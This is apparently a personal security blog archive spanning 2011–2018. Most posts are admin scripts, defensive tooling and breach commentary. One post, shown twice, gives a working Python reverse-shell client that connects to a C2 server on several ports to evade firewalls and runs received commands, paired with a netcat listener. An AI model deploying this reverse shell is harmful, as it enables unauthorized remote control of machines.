#!/bin/bash
#***********************************************
#* Author: mmyrick
#* Date Created: 20180531
#* Purpose: Monitor a website for signs of change
#* Environment: Works from OSX v10.13.4
#************************************************
##THIS MUST BE SET MANUALLY
#Download Page, Hash Page, and Assign Original MD5
curr=f9a38facacc54241e4028bd2d2108a8b
#BEGIN ENDLESS LOOP
while true; do
#Download webpage
/usr/bin/curl -s -o /tmp/blah.txt www.purple.com
#Sleep for 5 seconds so page can download
/bin/sleep 5
#Hash the page
new=$(/sbin/md5 /tmp/blah.txt | cut -f4 -d " ")
#/bin/echo $new
#Compare the two MD5 values
if [[ "$new" != "$curr" ]]
then
#PRINT ONLY IF Something Has Changed
/bin/echo "THE WEBPAGE HAS CHANGED"
/bin/echo "THE WEBPAGE HAS CHANGED"
/bin/echo "THE WEBPAGE HAS CHANGED"
/bin/echo "THE WEBPAGE HAS CHANGED"
/bin/echo "THE WEBPAGE HAS CHANGED"
fi
#Remove temp files
/bin/rm /tmp/blah.txt
#Get WebPage Once Every 5 Min
/bin/sleep 300
#Run Again
done
Thursday, May 31, 2018
Saturday, January 13, 2018
Simple Python HTTP Server
There are times when you'll need a simple way to transfer a file. The Python one liner below will start a web server from any directory by invoking the command below:
Python V2:
python -m SimpleHTTPServer 8080
Python V3:
python3 -m http.server 8080
Python V2:
python -m SimpleHTTPServer 8080
Python V3:
python3 -m http.server 8080
Friday, January 12, 2018
Simple Python Reverse Shell Client
You never know when you'll need persistent control of a remote machine. The script below can typically be used in conjunction with a C2 server you control running the following: nc -nv -l -p 21
nc -h (-n=don't resolve hostnames, -v=verbose, -l=listen, -p=port)
Print statements have been commented out below for your convenience.
#!/user/bin/env python -tt
#NECESSARY LIBS
import socket
import time
import subprocess
##BEGIN CONNECTION ROUTINE
#print "Starting Connection ..."
mysocket = socket.socket()
connected = False
##ATTEMPT TO CONNECT TO C2 SERVER
while not connected:
#FOR ATTEMPTING TO EVADE FIREWALL, REDUCE PORTS AS NECESSARY
for port in [21, 22, 80, 443]:
time.sleep(2)
try:
#print "Attempting Port:", port
##CHANGE IP BELOW TO YOUR C2 SERVER
mysocket.connect(("127.0.0.1", port)
except socket.error:
#print "Not Able To Connect"
continue
else:
#print "Connection Successful"
connected = True
break
##WE ARE NOW CONNECTED
while True:
commandrequested = mysocket.recv(1024)
prochandle = subprocess.Popen(commandrequested, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
##ALLOW PROGRAM TO SAFELY WAIT FOR ABOVE PROCESS TO COMPLETE
prochandle.wait()
results = prochandle.stdout.read() + prochandle.stderr.read()
mysocket.send(results)
Known Limitations:
1) send/recv have transfer limitations (~12k)
2) "cd" appears (it actually does) NOT to work as EACH command spawns a new shell
nc -h (-n=don't resolve hostnames, -v=verbose, -l=listen, -p=port)
Print statements have been commented out below for your convenience.
#!/user/bin/env python -tt
#NECESSARY LIBS
import socket
import time
import subprocess
##BEGIN CONNECTION ROUTINE
#print "Starting Connection ..."
mysocket = socket.socket()
connected = False
##ATTEMPT TO CONNECT TO C2 SERVER
while not connected:
#FOR ATTEMPTING TO EVADE FIREWALL, REDUCE PORTS AS NECESSARY
for port in [21, 22, 80, 443]:
time.sleep(2)
try:
#print "Attempting Port:", port
##CHANGE IP BELOW TO YOUR C2 SERVER
mysocket.connect(("127.0.0.1", port)
except socket.error:
#print "Not Able To Connect"
continue
else:
#print "Connection Successful"
connected = True
break
##WE ARE NOW CONNECTED
while True:
commandrequested = mysocket.recv(1024)
prochandle = subprocess.Popen(commandrequested, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
##ALLOW PROGRAM TO SAFELY WAIT FOR ABOVE PROCESS TO COMPLETE
prochandle.wait()
results = prochandle.stdout.read() + prochandle.stderr.read()
mysocket.send(results)
Known Limitations:
1) send/recv have transfer limitations (~12k)
2) "cd" appears (it actually does) NOT to work as EACH command spawns a new shell
Friday, September 19, 2014
Harvesting Actionable Security Intelligence From Palo Alto Networks Botnet Report
Buried deep within the Palo Alto Networks firewall is a mini correlation engine that normally doesn't seem to get much attention. This correlation engine produces a daily "botnet report" (monitoring->botnet report) containing machines exhibiting strange behavior (HTTP connections to an IP instead of domain, downloading executable content, connecting to domains categorized as malware, connecting to a newly registered domain, etc). The best part is there is also a scoring system (1 the lowest - 4 the highest) for risk, so if you don't want to wade through (potentially) hundreds of alerts, you can focus on just the highest. In my environment, I like to focus on anything 3 or above. Over the years, this report has been so useful that we've actually integrated it into our SOC workflow by leveraging the PAN API.
If you're looking to leverage every last bit of your security investment from your Palo Alto Networks firewall, you will be pleasantly surprised by the botnet report. The BASH script below will automatically harvest and email only the highest level of alerts to an email of your choice for further analysis! Enjoy.
#!/bin/bash
######################################################################################## # Author: Matthew Myrick # Date Created: 20131007 # Date Modified: 20131020 # Purpose: This script will pull the botnet information from ALL Pans and create # trac tickets for anything with a confidence of more than 2. # Usage: ./pan_botnet_trac.sh # # Dependencies: # API keys and PAN IP's must be current/accurate. ######################################################################################### #SINCE ONLY NEWER VERSIONS OF BASH SUPPORT ASSOCIATIVE ARRAYS, I OPTED NOT TO USE THEM...FOR PORTABILITY REASONS #DEFINE PALO ALTO FIREWALLS: ASH="10.xx.xx.xx" BNE="10.xx.xx.xx" #DEFINE PALO ALTO FIREWALL KEYS: ASHkey="enterkey" BNEkey="enterkey" #PUT ALL FIREWALLS IN AN ARRAY SO WE CAN ITERATE! BOXES=( $ASH $BNE ) KEYS=( $ASHkey $BNEkey ) #SETUP DESCRIPTION FOR HEADER: DATE=`/bin/date --date=yesterday +"%Y%m%d"` DESC="PALO_ALTO_BOTNET_REPORT-"$DATE #echo $DESC #LOOP THROUGH PANS: #GET THE SIZE OF THE ARRAY TOTAL=${#BOXES[*]} #ITERATE THROUGH FIREWALLS, COLLECTING REPORTS AND CHECKING FOR CONFIDENCE > 2 for (( i=0; i<=$(( $TOTAL -1 )); i++ )) do #echo "Connecting to ${BOXES[$i]} " /usr/bin/curl -s -k "https://${BOXES[$i]}/api/?type=report&reporttype=predefined&reportname=botnet&key=${KEYS[$i]}" | awk -F '[<>]' '{if ($3 > 2) print $3,$7,$11,$19,$23}' >> /tmp/pan_botnet.txt #####TO SEE FULL OUTPUT UNCOMMENT THE LINE BELOW #/usr/bin/curl -s -k "https://${BOXES[$i]}/api/?type=report&reporttype=predefined&reportname=botnet&key=${KEYS[$i]}" #TEST="/usr/bin/curl -s -k https://${BOXES[$i]}/api/?type=report&reporttype=predefined&reportname=botnet&key=${KEYS[$i]}" #echo $TEST done #PRINT/EMAIL TEMP FILE ONLY IF THERE IS DATA #/bin/cat /tmp/pan_botnet.txt if [ -s /tmp/pan_botnet.txt ]; then #ADD HEADER TO FILE /bin/sed -i '1iConfidence(4=Highest) Source Reason:' /tmp/pan_botnet.txt /bin/sed -i "1i$DESC" /tmp/pan_botnet.txt #EMAIL FILE TO TRAC /bin/mail -s "Palo Alto Daily Botnet Report" blah@stuff.com < /tmp/pan_botnet.txt fi #REMOVE THE TEMP FILE /bin/rm -f /tmp/pan_botnet.txt
Wednesday, November 20, 2013
Google's tool for analyzing email headers
I periodically have the need to dig through email headers to figure out when the email originated. Email headers aren't rocket science (essentially a LIFO stack), but they make my eyes wiggle. Today, I stumbled across Google's tool for deciphering these logs...and it's pretty cool.
https://toolbox.googleapps.com/apps/messageheader/analyzeheader
This tool takes a header like this:
Delivered-To: f00bar@gmail.com
Received: by 10.182.148.167 with SMTP id tt7csp107427obb;
Wed, 20 Nov 2013 14:09:06 -0800 (PST)
X-Received: by 10.15.81.129 with SMTP id x1mr49625eey.55.1384985344849;
Wed, 20 Nov 2013 14:09:04 -0800 (PST)
Return-Path: <noreply@malwr.com>
Received: from malwr.com ([46.244.22.3])
by mx.google.com with ESMTP id w6si12230921eeg.336.2013.11.20.14.09.04
for <f00bar@gmail.com>;
Wed, 20 Nov 2013 14:09:04 -0800 (PST)
Received-SPF: neutral (google.com: 46.244.22.3 is neither permitted nor denied by best guess record for domain of noreply@malwr.com) client-ip=46.244.22.3;
Authentication-Results: mx.google.com;
spf=neutral (google.com: 46.244.22.3 is neither permitted nor denied by best guess record for domain of noreply@malwr.com) smtp.mail=noreply@malwr.com
Received: from cuckoo.shadowserver.org (localhost [127.0.0.1])
by malwr.com (Postfix) with ESMTP id EC56417818CD
for <f00bar@gmail.com>; Wed, 20 Nov 2013 14:09:02 -0800 (PST)
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Subject: Malwr - Analysis completed!
From: noreply@malwr.com
To: f00bar@gmail.com
Date: Wed, 20 Nov 2013 22:09:02 -0000
Message-ID: <20131120220902.24101.27746@cuckoo.shadowserver.org>
And makes it easier to look at, like this:
https://toolbox.googleapps.com/apps/messageheader/analyzeheader
This tool takes a header like this:
Delivered-To: f00bar@gmail.com
Received: by 10.182.148.167 with SMTP id tt7csp107427obb;
Wed, 20 Nov 2013 14:09:06 -0800 (PST)
X-Received: by 10.15.81.129 with SMTP id x1mr49625eey.55.1384985344849;
Wed, 20 Nov 2013 14:09:04 -0800 (PST)
Return-Path: <noreply@malwr.com>
Received: from malwr.com ([46.244.22.3])
by mx.google.com with ESMTP id w6si12230921eeg.336.2013.11.20.14.09.04
for <f00bar@gmail.com>;
Wed, 20 Nov 2013 14:09:04 -0800 (PST)
Received-SPF: neutral (google.com: 46.244.22.3 is neither permitted nor denied by best guess record for domain of noreply@malwr.com) client-ip=46.244.22.3;
Authentication-Results: mx.google.com;
spf=neutral (google.com: 46.244.22.3 is neither permitted nor denied by best guess record for domain of noreply@malwr.com) smtp.mail=noreply@malwr.com
Received: from cuckoo.shadowserver.org (localhost [127.0.0.1])
by malwr.com (Postfix) with ESMTP id EC56417818CD
for <f00bar@gmail.com>; Wed, 20 Nov 2013 14:09:02 -0800 (PST)
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Subject: Malwr - Analysis completed!
From: noreply@malwr.com
To: f00bar@gmail.com
Date: Wed, 20 Nov 2013 22:09:02 -0000
Message-ID: <20131120220902.24101.27746@cuckoo.shadowserver.org>
And makes it easier to look at, like this:
Thursday, November 14, 2013
Making Sure Logs Don't Get Out of Control
Sometimes, you need a little script to make sure your logs aren't getting too crazy. Enjoy!
#! /bin/bash
###################################################################
#
# Author: Matthew Myrick
# Date Created: 20120330
# Date Modified: 20120330
# Purpose: This scripts is used to remove old data when the
# disk is over 97% full
#
# Dependencies: CRON
#
####################################################################
#CHECK TO SEE DISK USE PERCENTAGE
perc="`df -h /Promise | tail --lines 1 | awk '{print $5}' | cut -d '%' -f 1`"
#COMPARE VALUE TO OUR LIMIT
if [ "$perc" -gt "97" ]; then
/usr/bin/find /Promise -maxdepth 1 -type d -printf "%T@ %p \n" | sort -n -k 1,1 | awk '{print $2}' | head -1 | xargs rm -rf
fi
Wednesday, October 30, 2013
FireEye Script To Manage YARA Across An Enterprise
FireEye has been a huge help to cyber security analysts over the years. However, nothing is perfect...and the lack of an API is a huge shortcoming (which I hear they are working on). To compensate for this shortcoming, I've written a bash script that will distribute a file of properly formatted Yara rules (you can also do the same thing for Snort rules) to FireEye devices (even with their latest enforcement of the rails authenticity token). Enjoy!
Monday, October 28, 2013
XOR From the Unix CLI
Every once in while (depending upon how hard you look) I'm faced with something that looks like an executable, but not quite. A very common tactic used by cyber criminals to evade IDS and analysts is to XOR executables (and sometimes data) so that they don't look suspicious. There are no shortage of ways to XOR, but I thought I'd share an easy method using perl, borrowed from Daniel Wesemann (https://isc.sans.edu/forums/diary/Exploit+cocktail+Struts+Java+Windows+going+after+3-month+old+vulnerabilities/16913).
In the example below he uses "cat" and "perl" to perform a single byte XOR (0x77) on a file called "data.hex" and then redirects that to a file called "data.exe".
cat data.hex | perl -pe 's/(..)/chr(hex($1)^0x77)/ge' > data.exe
Wednesday, January 16, 2013
The Basics of Linux Screen
Screen is an awesome utility that offers the ability to detach a long running process (or program, shell-script, irc window, etc.) from a session and then attach it back at a later time. Below are the basics:
To get started, enter:
screen
To see your existing screen sessions, enter:
screen -list
To detach an attached screen, enter:
screen -D
To re-attach to a detached screen, enter:
screen -r
Monday, January 14, 2013
Java 0day is upon us and no patch in Sight!
And... the Java 0day is here. Actually, I am way late. So late that there is a patch. But careful, its not really a patch. Its just a configuration setting :p So no matter what you do, I encourage you to think about this one very, very, seriously.
Monday, November 19, 2012
Simply Adding To The GIT Repo
Seems I'm always forgetting the git syntax for checking things into the repo...simply follow the steps below and you should be alright.
// before you make changes to your local git dir..
git pull // to get you in sync with the main repo
//write your file to the local git directory where you want it
git status // this will give you an idea of the changes
git add path/to/new/file
git commit -m "some witty comment here"
git push
Thursday, December 8, 2011
Analyzing Flash Files
A friend told me about this, so I thought I'd share....
xxxswf.py is a Python script for carving, scanning, compressing, decompressing and analyzing Flash SWF files. The script can be used on an individual SWF, single SWF or multiple SWFs embedded in a file stream or all files in a directory. The tool could be useful for system admistrators, incident response, exploit analyst, malware analyst or web developers.
http://hooked-on-mnemonics.blogspot.com/2011/12/xxxswfpy.html
Tuesday, August 9, 2011
Australian DSD Strategies to Mitigate Targetted Attacks
Vendors certainly have their place when it comes to the cyber war against protecting your information, but it is important to understand that there is no silver bullet. Below you will find a very informative (arguably conclusive) list of mitigations (most of which don't require additional hardware/software) to defend against targeted cyber intrustions.
Australian DSD Strategies to Mitigate Targetted Attacks
Wednesday, July 6, 2011
Linux Password Protect Zips
To Zip: zip -P <password> -r <output.zip> <input file(s)>
To Unzip: unzip <output.zip>
Wednesday, June 1, 2011
Northrup Grumman...Another one bites the dust!
 |
| A Northrop Grumman E-2C Hawkeye 2000 surveillance and reconnaisance plane lands on a carrier. |
In a story recently released by Fox (http://www.foxnews.com/scitech/2011/05/31/northrop-grumman-hit-cyber-attack-source-says/) we see that Northrup Grumman was also compromised via remote access. We can chalk this up to yet another compromise as a result of the intrusion at RSA where the secret sauce was stolen. I wonder if any of these companies are going to go after EMC/RSA for damages?
The article is fairly vague (surprise), but it looks as though the "bad guys" were able to get in. That is unless somebody just accidentally tripped over the cable for the remote access network.
Saturday, May 28, 2011
Hackers breached U.S. defense contractors (Reuters)
(Reuters) - "Unknown hackers have broken into the security networks of Lockheed Martin Corp (LMT.N) and several other U.S. military contractors, a source with direct knowledge of the attacks told Reuters. "
"They breached security systems designed to keep out intruders by creating duplicates to "SecurID" electronic keys from EMC Corp's (EMC.N) RSA security division, said the person who was not authorized to publicly discuss the matter." Reuters
Here's another link to a similar story from the Taipei Times
"They breached security systems designed to keep out intruders by creating duplicates to "SecurID" electronic keys from EMC Corp's (EMC.N) RSA security division, said the person who was not authorized to publicly discuss the matter." Reuters
Here's another link to a similar story from the Taipei Times
Monday, May 23, 2011
Remove Character From Bash Variable
Sometimes, it is the little things that take an extra few minutes to find on the Internet that really slow you down...
Remove the first character from a bash variable:
VAR=${VAR#?}
Remove the last character from a bash variable
VAR=${VAR%?}
Friday, May 20, 2011
Rename Perl script on the Mac
I love Linux and BSD. I also love my Mac. I really like the user interface, and the underlying BSD roots. (Insert generic Mac fan-pitch)
There are a few things which drive me NUTS about the BSD underpinnings of the Mac, though. MacPorts is a great step in the direction of bringing better Linux/BSD program onto the Mac platform, but it doesn't always have everything you need (And it's pretty slow). The most recent annoyance is the lack of the 'rename' linux command, my favorite of which enables me to bulk rename files based on a regular expression. Yes, I could hack together an awk or bash script to do this each time, but (like Matt), I like simpler == better.
So, when I ran into this issue yesterday, I decided I had enough. It turns out that the rename linux command that I like (based on regular expressions, not some other more simplistic syntax shipped with Redhat) is just a perl script.
So, I found the script on one of my Ubuntu servers (prename), slapped it into /usr/local/bin, and away I went. Much easier than some other custom compiling Mac solutions.
Wednesday, May 18, 2011
Android and the long-lived authToken
I was very disappointed to hear about Android sending long lived (~2 weeks) auth tokens in the clear for Google services...very similar to the Facebook/Firesheep issue. There are a few writeups, but the research was originally done by Ulm University (http://www.uni-ulm.de/en/in/mi/staff/koenings/catching-authtokens.html).
This specific vulnerability is addressable by server-side changes to enforce SSL when exchanging the tokens. I'm glad to hear that Google is moving forward on fixing this side of things. People are also saying it's only exploitable via WiFi, but I wouldn't be surprised to hear some type of 3G snooping as well.
BUT, this brings up major concerns that the Operating System versions for Android are so fractured, and ultimately are controlled by the wireless providers. Even though the latest version of Android don't exhibit this behavior, the mobile phone companies continue to drag their feet pushing the updates. This is akin to vendors which only support IE6...they drag their feet because they can. I think larger customers need to push back that we need prompt patching (or the ability to self-update!)
Subscribe to:
Posts (Atom)